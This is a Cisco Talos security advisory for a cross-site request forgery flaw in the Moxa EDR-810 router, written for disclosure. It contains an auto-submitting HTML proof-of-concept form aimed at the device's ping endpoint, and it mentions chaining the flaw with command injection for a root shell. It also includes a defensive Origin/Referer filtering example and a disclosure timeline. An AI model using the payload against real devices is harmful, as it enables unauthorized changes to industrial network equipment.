Headline
CVE-2017-12126: TALOS-2017-0478 || Cisco Talos Intelligence Group
Summary
An exploitable cross-site request forgery vulnerability exists in the web server functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted HTTP packet can cause cross-site request forgery. An attacker can create malicious HTML to trigger this vulnerability.
Tested Versions
Moxa EDR-810 V4.1 build 17030317
Product URLs
https://www.moxa.com/product/EDR-810.htm
CVSSv3 Score
8.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE
CWE-352 - Cross-Site Request Forgery (CSRF)
Details
To trigger the CSRF, a logged-in user needs to visit a page that contains malicious code. The malicious code can then do anything the logged-in user can do: for example, it could add a user, modify firewall rules, etc. This could also be chained with a command injection to get a root shell on the device. The problem is compounded by the fact that users cannot log out of the device, so a user's session remains valid long after they have stopped interacting with the device.
Exploit Proof-of-Concept
<html>
<body>
<form action="http://192.168.127.254/goform/net_WebPingGetValue" method="POST">
<input type="hidden" name="pingTmp" value="192.168.127.22" />
<input type="hidden" name="ifs" value="1" />
<input type="hidden" name="ip" value="192.168.127.22" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
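For defenders, the request this form produces can be told apart from one sent by the device's own web UI by its Origin or Referer header. The following is an added example, not code from Talos or Moxa: it assumes a filtering proxy in front of the management interface, and every host other than the device address above is a constructed placeholder.

```python
from urllib.parse import urlsplit

STATE_CHANGING = {"POST", "PUT", "PATCH", "DELETE"}

def _norm(netloc):
    """Lower-case a host[:port] and drop the default HTTP port."""
    netloc = netloc.strip().lower()
    return netloc[:-3] if netloc.endswith(":80") else netloc

def initiator(headers):
    """Host of the page that caused the request, from Origin or else Referer."""
    for name in ("origin", "referer"):
        value = headers.get(name, "").strip()
        if not value:
            continue
        if value == "null":  # opaque origin (sandboxed frame, data: URL)
            return "null"
        return _norm(urlsplit(value).netloc) or "null"
    return None

def verdict(method, headers):
    """Return (allowed, reason) for one request to the management interface."""
    if method.upper() not in STATE_CHANGING:
        return True, "safe method"
    src = initiator(headers)
    if src is None:
        return False, "no Origin or Referer on state-changing request"
    if src != _norm(headers.get("host", "")):
        return False, f"cross-site request from {src}"
    return True, "same-origin"

# Constructed sample requests (header names lower-cased). Only the device
# address comes from the advisory; the other hosts are placeholders.
SAMPLES = [
    ("POST", {"host": "192.168.127.254", "origin": "http://192.168.127.254"}),
    ("POST", {"host": "192.168.127.254", "origin": "http://forum.example.test"}),
    ("POST", {"host": "192.168.127.254", "referer": "http://forum.example.test/post/1"}),
    ("POST", {"host": "192.168.127.254", "origin": "null"}),
    ("POST", {"host": "192.168.127.254"}),
    ("GET", {"host": "192.168.127.254"}),
]

if __name__ == "__main__":
    for method, headers in SAMPLES:
        print(method, headers, "->", verdict(method, headers))
```

Rejecting state-changing requests that carry neither header is the strict choice and will also block non-browser clients that omit them.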
Timeline
2017-11-15 - Vendor Disclosure
2017-11-19 - Vendor Acknowledged
2017-12-25 - Vendor provided timeline for fix (Feb 2018)
2018-01-04 - Timeline pushed to mid-March per vendor
2018-03-24 - Talos follow up with vendor for release timeline
2018-03-26 - Timeline pushed to 4/13/18 per vendor
2018-04-12 - Vendor patched & published new firmware on website
2018-04-13 - Public Release
Discovered by Carlos Pacho of Cisco Talos.